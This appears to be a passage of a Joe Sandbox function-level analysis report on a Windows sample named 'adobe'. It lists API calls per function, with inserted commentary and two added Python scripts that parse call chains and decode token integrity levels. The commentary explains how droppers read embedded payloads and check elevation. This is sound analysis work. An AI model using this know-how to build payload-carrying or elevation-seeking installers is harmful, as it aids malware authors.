• Instruction Fuzzy Hash: A8114A72B4030127E310BA7E9C86B5B76899B88748F05483FB506EB383DEB9DC094399
Uniqueness
Uniqueness Score: -1.00%

APIs
• OffsetRect.USER32(?,?,00000000), ref: 00493FEC
• OffsetRect.USER32(?,00000000,?), ref: 00494007
• OffsetRect.USER32(?,?,00000000), ref: 00494021
• OffsetRect.USER32(?,00000000,?), ref: 0049403C
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: OffsetRect
• String ID:
• API String ID: 177026234-0
• Opcode ID: ab4949aaadf672aa91bcf60ec4cb1bd0ff8ae663f32d17df6b9826decd7ffb93
• Instruction ID: 6ea8699f142f5b744308f5fb49fe63af15150726bd9fdc74535c03b54fc39d6b
• Opcode Fuzzy Hash: ab4949aaadf672aa91bcf60ec4cb1bd0ff8ae663f32d17df6b9826decd7ffb93
• Instruction Fuzzy Hash: 9E218EB67042019FD700DE69CD85E6BB7EEEBC4304F14CA2AF594C7349D634E9448796
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetCursorPos.USER32 ref: 00417270
• SetCursor.USER32(00000000), ref: 004172B3
• GetLastActivePopup.USER32(?), ref: 004172DD
• GetForegroundWindow.USER32(?), ref: 004172E4
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Cursor$ActiveForegroundLastPopupWindow
• String ID:
• API String ID: 1959210111-0
• Opcode ID: 1f027ba62758c6f6e16121a435271ae36784e877d78f723a05b38686a1b288de
• Instruction ID: d42235d32f12bbd537443306c781531a61dc82822ae97907460fdfc4b9dfd860
• Opcode Fuzzy Hash: 1f027ba62758c6f6e16121a435271ae36784e877d78f723a05b38686a1b288de
• Instruction Fuzzy Hash: E02183313086018BCB20EB69D885AD773B1AB44758F4545ABF895CB352D73DDC82CB89
Uniqueness
Uniqueness Score: -1.00%

APIs
• MulDiv.KERNEL32(?,00000008,?), ref: 00493C55
• MulDiv.KERNEL32(?,00000008,?), ref: 00493C69
• MulDiv.KERNEL32(?,00000008,?), ref: 00493C7D
• MulDiv.KERNEL32(?,00000008,?), ref: 00493C9B
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                          • Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                                                                                          • Instruction ID: 8abd8040eba731fbe526ab5f7b53f6c2a8ab0f8d37bf7bd3a460e12037392c69
                                                                                                                                                          • Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                                                                                          • Instruction Fuzzy Hash: 7F112E72604604ABCF40DEA9D8C4D9B7BECEF4D364B1441AAF918EB246D634ED408BA4
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetClassInfoA.USER32(00400000,0041F480,?), ref: 0041F4B1
• UnregisterClassA.USER32(0041F480,00400000), ref: 0041F4DA
• RegisterClassA.USER32(00498598), ref: 0041F4E4
• SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F51F
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Class$InfoLongRegisterUnregisterWindow
• String ID:
• API String ID: 4025006896-0
• Opcode ID: 9da16f95b0ca95f6f98f2aa1ee6ab2fa4b74d09379c763118f1aaf581a933dc1
• Instruction ID: 3ade520867520f28231aed23d56b060c1ae6e85fc3aaaf2b039856689379b016
• Opcode Fuzzy Hash: 9da16f95b0ca95f6f98f2aa1ee6ab2fa4b74d09379c763118f1aaf581a933dc1
• Instruction Fuzzy Hash: 600152B12401047BCB10EF6DED81E9B37999769314B11413BBA05E72E1DA3A9C194BAD
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D227
• LoadResource.KERNEL32(00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047B758,0000000A,REGDLL_EXE), ref: 0040D241
• SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047B758), ref: 0040D25B
• LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?), ref: 0040D265
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID:
• API String ID: 3473537107-0
• Opcode ID: 98a3eb2f97eb90f8deac50020965559c1c53970ac69ea9c81a72a03a0abc3839
• Instruction ID: 8b55825d53d46818f15098a3aa340eb6897fe62b828c159971ec5f2842f97e2f
• Opcode Fuzzy Hash: 98a3eb2f97eb90f8deac50020965559c1c53970ac69ea9c81a72a03a0abc3839
• Instruction Fuzzy Hash: ADF062736046046F8704EE9DA881D5B77ECDE88364310017FF908EB246DA38DD018B78
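The records in this section are the raw material an analyst works from: each one lists the Win32 calls of a single function in the order of their call sites. Two chains here are worth recognising on sight. The FindResource/LoadResource/SizeofResource/LockResource sequence is how a binary reads data embedded in its own resource section, which is also how many droppers carry a payload. The RegOpenKeyEx/RegDeleteValue/RegCloseKey/RemoveFontResource/SendNotifyMessage(0xFFFF, 0x1D) sequence is the standard way to uninstall a font (0xFFFF is HWND_BROADCAST and 0x1D is WM_FONTCHANGE). Note also that the argument lists hold more values than the API's prototype takes (LoadResource takes two, the report shows sixteen), so trailing values are stack contents at the call site rather than parameters; some of them decode to printable ASCII, which usually means string data was left on the stack. The script below is an added example and not part of the report or of Joe Sandbox; it parses bullet lines in the report's format, matches known call chains as ordered subsequences (A/W suffixes folded together), and decodes stack dwords that look like ASCII. The sample input is constructed from lines copied from the records on this page, and the chain names are this example's own labels.

```python
"""Parse the per-function API bullet lines of a Joe Sandbox HCA report and
flag known Win32 call chains (added example; not Joe Sandbox tooling)."""
import re
import string
from typing import NamedTuple, Optional

# Constructed input: bullet lines copied from two records on this page
# (the resource-loading record and the font-removal record with its
# "Part of subcall function" line).
SAMPLE_LINES = r"""
• FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D227
• LoadResource.KERNEL32(00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047B758,0000000A,REGDLL_EXE), ref: 0040D241
• SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047B758), ref: 0040D25B
• LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?), ref: 0040D265
  • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,[!H,?,00000001,?,?,0048215B,?,00000001,00000000), ref: 0042DD60
• RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045AFCE,?,?,?,?,?,00000000,0045AFF5), ref: 00455304
• RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045AFCE,?,?,?,?,?,00000000), ref: 0045530D
• RemoveFontResourceA.GDI32(00000000), ref: 0045531A
• SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0045532E
"""

# One bullet line: optional subcall prefix, Api.DLL(args), ref: address.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}): )?"
    r"(?P<api>\w+)\.(?P<dll>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Chain labels are this example's own; the API sequences are the ones the
# report shows. HWND_BROADCAST=0xFFFF / WM_FONTCHANGE=0x1D in the last call.
CHAINS = {
    "embedded-resource-read": ("FindResource", "LoadResource", "SizeofResource", "LockResource"),
    "font-uninstall": ("RegOpenKeyEx", "RegDeleteValue", "RegCloseKey",
                       "RemoveFontResource", "SendNotifyMessage"),
}


class ApiCall(NamedTuple):
    api: str
    dll: str
    args: tuple
    ref: int
    subcall: Optional[int]  # function the call belongs to, if listed as a subcall


def parse_api_lines(text: str) -> list:
    """Turn report bullet lines into ApiCall records; blank lines are skipped."""
    calls = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised line: {line!r}")
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        calls.append(ApiCall(m["api"], m["dll"], args, int(m["ref"], 16),
                             int(m["sub"], 16) if m["sub"] else None))
    return calls


def base_name(api: str) -> str:
    """Fold the ANSI/Unicode suffix: FindResourceA and FindResourceW compare equal.
    Heuristic: strip a trailing A/W only when the preceding character is lowercase."""
    if len(api) > 2 and api[-1] in "AW" and api[-2].islower():
        return api[:-1]
    return api


def find_chain(calls: list, chain: tuple):
    """Match `chain` as an ordered subsequence of the calls sorted by call-site
    address; return the matching refs, or None if the chain is incomplete."""
    wanted = list(chain)
    hits = []
    for c in sorted(calls, key=lambda c: c.ref):
        if wanted and base_name(c.api) == wanted[0]:
            hits.append(c.ref)
            wanted.pop(0)
    return hits if not wanted else None


def printable_dwords(call: ApiCall) -> list:
    """Hex arguments whose four little-endian bytes are all printable ASCII:
    usually string fragments left on the stack rather than real parameters."""
    ok = set(string.printable) - set("\t\n\r\x0b\x0c")
    out = []
    for a in call.args:
        if re.fullmatch(r"[0-9A-Fa-f]{8}", a):
            raw = bytes.fromhex(a)[::-1]
            if all(chr(b) in ok for b in raw):
                out.append((a, raw.decode("ascii")))
    return out


def scan(text: str) -> dict:
    """Map each chain label to the refs that complete it (or None)."""
    calls = parse_api_lines(text)
    return {name: find_chain(calls, chain) for name, chain in CHAINS.items()}


if __name__ == "__main__":
    for name, refs in scan(SAMPLE_LINES).items():
        print(name, [f"{r:08X}" for r in refs] if refs else "not found")
    for c in parse_api_lines(SAMPLE_LINES):
        for hexval, text in printable_dwords(c):
            print(f"{c.api} @ {c.ref:08X}: stack dword {hexval} looks like {text!r}")
```

Sorting by call-site address reproduces the report's listing order, which is address order rather than execution order; a chain match therefore says the function contains these calls in this layout, not that they executed in that sequence on this run.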
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(00000000,00000000), ref: 0046EF8D
Strings
• Unsetting NTFS compression on directory: %s, xrefs: 0046EF73
• Setting NTFS compression on directory: %s, xrefs: 0046EF5B
• Failed to set NTFS compression state (%d)., xrefs: 0046EF9E
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: ErrorLast
• String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
• API String ID: 1452528299-1392080489
• Opcode ID: 70e1dcd70b450565549ad8351c6ba8376395d31221726c645a1b23065240a2c2
• Instruction ID: 90f263befbfc2ed38cb9fa519f29dd23f6ca26fd9398365abe1a4f1750a61a51
• Opcode Fuzzy Hash: 70e1dcd70b450565549ad8351c6ba8376395d31221726c645a1b23065240a2c2
• Instruction Fuzzy Hash: D9016730E0828867CF08D7EE60412DDBBE49F4D354F5481EFB458DB282EB7905088BAB
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,[!H,?,00000001,?,?,0048215B,?,00000001,00000000), ref: 0042DD60
• RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045AFCE,?,?,?,?,?,00000000,0045AFF5), ref: 00455304
• RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045AFCE,?,?,?,?,?,00000000), ref: 0045530D
• RemoveFontResourceA.GDI32(00000000), ref: 0045531A
• SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0045532E
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
• String ID:
• API String ID: 4283692357-0
• Opcode ID: 12e5d50a70df0223fb4e5adef86696197cf9ed238cf81687b75c51c125de9243
• Instruction ID: 52e3aeb2f0b2f45aa49b8753349bc449d62e6f0ad3e8c43972c27c65c40ff478
• Opcode Fuzzy Hash: 12e5d50a70df0223fb4e5adef86696197cf9ed238cf81687b75c51c125de9243
• Instruction Fuzzy Hash: 48F054B575070036EA10B6B69C47F5B168C9F54745F10483BB904EF2C3D97CD804962D
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(?,00000000), ref: 0046F739
Strings
• Unsetting NTFS compression on file: %s, xrefs: 0046F71F
• Failed to set NTFS compression state (%d)., xrefs: 0046F74A
• Setting NTFS compression on file: %s, xrefs: 0046F707
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: ErrorLast
• String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
• API String ID: 1452528299-3038984924
• Opcode ID: bdfa13107025dcd78ac457e81406d0b5a6157c74cf38ea943c4e55576a3d71ef
• Instruction ID: f59cf1e2ce1af00abf56b5bc0a41f2d9024385d3f2bbc815d9fc5944cd6688d7
• Opcode Fuzzy Hash: bdfa13107025dcd78ac457e81406d0b5a6157c74cf38ea943c4e55576a3d71ef
• Instruction Fuzzy Hash: 77014430E082485ACF14DBE9B0512DDBBA4AF09355F4485FB7498D7282EA79090C97AA
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast$CountSleepTick
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2227064392-0
                                                                                                                                                          • Opcode ID: 7f04e0f05680e82646a7c67b04eda29bcd00b6381a5fcaa2afde3976f5337cae
                                                                                                                                                          • Instruction ID: f3e139474b33760e13a41918489e3ce7d48b14196341e5dbc503218970ea5f8b
                                                                                                                                                          • Opcode Fuzzy Hash: 7f04e0f05680e82646a7c67b04eda29bcd00b6381a5fcaa2afde3976f5337cae
                                                                                                                                                          • Instruction Fuzzy Hash: 61E0E5F3309504458A2035BF2C837EF4688CA853A4B14553FF398D6282C5184C0545AE
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,0047FACB,?,?,?,?,?,0049739E,00000000), ref: 00476E29
                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047FACB,?,?,?,?,?,0049739E), ref: 00476E2F
                                                                                                                                                          • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047FACB), ref: 00476E51
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047FACB), ref: 00476E62
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 215268677-0
                                                                                                                                                          • Opcode ID: e2728acfe09f276dde31732de6b3ef75bc87fd409fbda21e3683c02b7b2e0786
                                                                                                                                                          • Instruction ID: 2b0e864392e04d63d4be4d22317bf8a61354631aa83d71046a7a405fca67f8c6
                                                                                                                                                          • Opcode Fuzzy Hash: e2728acfe09f276dde31732de6b3ef75bc87fd409fbda21e3683c02b7b2e0786
                                                                                                                                                          • Instruction Fuzzy Hash: 5DF0A0A02407006BDA00EAB5CC82E9B73DCEB44714F04883A7E98C72C2D638DC08AB36
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%
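
The four calls listed above (GetCurrentProcess, OpenProcessToken with TOKEN_QUERY = 0x8, GetTokenInformation with class 0x12 = TokenIntegrityLevel, CloseHandle) are the standard way a process learns which integrity level it runs at, which is what an installer or dropper consults before deciding whether it must relaunch itself elevated. The following is an added example, not code from the sample or from this report: it decodes the TOKEN_MANDATORY_LABEL buffer that GetTokenInformation fills, from a constructed buffer so it runs on any platform, and issues the real call sequence through ctypes only when run on Windows. The struct layout assumes the 32-bit PE seen here (8-byte SID_AND_ATTRIBUTES header) unless a pointer size of 8 is passed.

```python
"""Decode the integrity level behind GetCurrentProcess -> OpenProcessToken ->
GetTokenInformation(TokenIntegrityLevel) -> CloseHandle.

Added example, not code from the sample or from the report.  Only
query_current_process_integrity() touches Windows APIs; everything else works
from a TOKEN_MANDATORY_LABEL buffer such as the one the sample must pick apart."""
import struct
import sys

# Mandatory-label RIDs: the last sub-authority of the S-1-16-<rid> SID.
INTEGRITY_LEVELS = {
    0x0000: "Untrusted",
    0x1000: "Low",
    0x2000: "Medium",
    0x2100: "Medium Plus",
    0x3000: "High",
    0x4000: "System",
    0x5000: "Protected Process",
}
MANDATORY_LABEL_AUTHORITY = 16          # identifier authority of S-1-16-*
SE_GROUP_INTEGRITY = 0x20
SE_GROUP_INTEGRITY_ENABLED = 0x40
TOKEN_QUERY = 0x0008                     # the 00000008 passed to OpenProcessToken
TOKEN_INTEGRITY_LEVEL = 0x12             # the 00000012 passed to GetTokenInformation


def parse_sid(buf, offset=0):
    """Parse a binary SID: revision (1 byte), sub-authority count (1 byte),
    48-bit big-endian identifier authority, then `count` little-endian DWORDs."""
    revision, count = struct.unpack_from("<BB", buf, offset)
    if revision != 1:
        raise ValueError(f"unsupported SID revision {revision}")
    authority = int.from_bytes(buf[offset + 2:offset + 8], "big")
    subs = list(struct.unpack_from(f"<{count}I", buf, offset + 8))
    text = "-".join(["S", str(revision), str(authority)] + [str(s) for s in subs])
    return text, authority, subs


def header_size(ptr_size):
    """sizeof(SID_AND_ATTRIBUTES): PSID + DWORD Attributes, padded to the pointer
    size.  The sample is a 32-bit PE, so 8 bytes; a 64-bit process sees 16."""
    return 8 if ptr_size == 4 else 16


def integrity_level_from_label(buf, ptr_size=4):
    """Interpret a TOKEN_MANDATORY_LABEL buffer as GetTokenInformation fills it:
    the SID_AND_ATTRIBUTES header, then the SID its pointer refers to.  The
    pointer is an absolute address in the queried process, so the SID is located
    by structure size instead of by following it."""
    attributes = struct.unpack_from("<I", buf, ptr_size)[0]
    if not attributes & SE_GROUP_INTEGRITY:
        raise ValueError("label SID is not flagged SE_GROUP_INTEGRITY")
    sid_text, authority, subs = parse_sid(buf, header_size(ptr_size))
    if authority != MANDATORY_LABEL_AUTHORITY or not subs:
        raise ValueError(f"{sid_text} is not a mandatory-label SID")
    rid = subs[-1]
    return sid_text, rid, INTEGRITY_LEVELS.get(rid, f"custom RID 0x{rid:x}")


def is_elevated(rid):
    """High integrity or above: the process already runs with an admin token
    and does not need the UAC relaunch an installer otherwise performs."""
    return rid >= 0x3000


def build_mandatory_label(rid, ptr_size=4):
    """Constructed test input (not captured from the sample): a
    TOKEN_MANDATORY_LABEL laid out as the kernel returns it, with a zeroed Sid
    pointer where the real buffer carries an address just past the header."""
    attrs = SE_GROUP_INTEGRITY | SE_GROUP_INTEGRITY_ENABLED
    header = (struct.pack("<II", 0, attrs) if ptr_size == 4
              else struct.pack("<QII", 0, attrs, 0))
    sid = (struct.pack("<BB", 1, 1)
           + MANDATORY_LABEL_AUTHORITY.to_bytes(6, "big")
           + struct.pack("<I", rid))
    return header + sid


def query_current_process_integrity():
    """Windows only: the same four-call sequence the sample makes, via ctypes."""
    import ctypes
    from ctypes import wintypes
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    adv = ctypes.WinDLL("advapi32", use_last_error=True)
    k32.GetCurrentProcess.restype = wintypes.HANDLE
    k32.CloseHandle.argtypes = [wintypes.HANDLE]
    adv.OpenProcessToken.argtypes = [wintypes.HANDLE, wintypes.DWORD,
                                     ctypes.POINTER(wintypes.HANDLE)]
    adv.OpenProcessToken.restype = wintypes.BOOL
    adv.GetTokenInformation.argtypes = [wintypes.HANDLE, ctypes.c_int, ctypes.c_void_p,
                                        wintypes.DWORD, ctypes.POINTER(wintypes.DWORD)]
    adv.GetTokenInformation.restype = wintypes.BOOL
    token = wintypes.HANDLE()
    if not adv.OpenProcessToken(k32.GetCurrentProcess(), TOKEN_QUERY, ctypes.byref(token)):
        raise ctypes.WinError(ctypes.get_last_error())
    try:
        needed = wintypes.DWORD()
        # First call with no buffer fails with ERROR_INSUFFICIENT_BUFFER and sets the size.
        adv.GetTokenInformation(token, TOKEN_INTEGRITY_LEVEL, None, 0, ctypes.byref(needed))
        buf = ctypes.create_string_buffer(needed.value)
        if not adv.GetTokenInformation(token, TOKEN_INTEGRITY_LEVEL, buf,
                                       needed.value, ctypes.byref(needed)):
            raise ctypes.WinError(ctypes.get_last_error())
    finally:
        k32.CloseHandle(token)
    return integrity_level_from_label(buf.raw, ctypes.sizeof(ctypes.c_void_p))


if __name__ == "__main__":
    sid, rid, name = integrity_level_from_label(build_mandatory_label(0x2000))
    print(f"constructed label: {sid} -> {name}, elevated={is_elevated(rid)}")
    if sys.platform == "win32":
        print("this process:", query_current_process_integrity())
```

The decoder refuses a label whose Attributes lack SE_GROUP_INTEGRITY or whose SID is not under authority 16, so a caller cannot be fooled by a buffer that merely looks like a mandatory label. RIDs outside the well-known set are reported as custom values rather than rounded, because Windows orders integrity levels numerically and a sandboxed process may carry an intermediate value.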

                                                                                                                                                          APIs
                                                                                                                                                          • GetLastActivePopup.USER32(?), ref: 0042425C
                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 0042426D
                                                                                                                                                          • IsWindowEnabled.USER32(?), ref: 00424277
                                                                                                                                                          • SetForegroundWindow.USER32(?), ref: 00424281
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
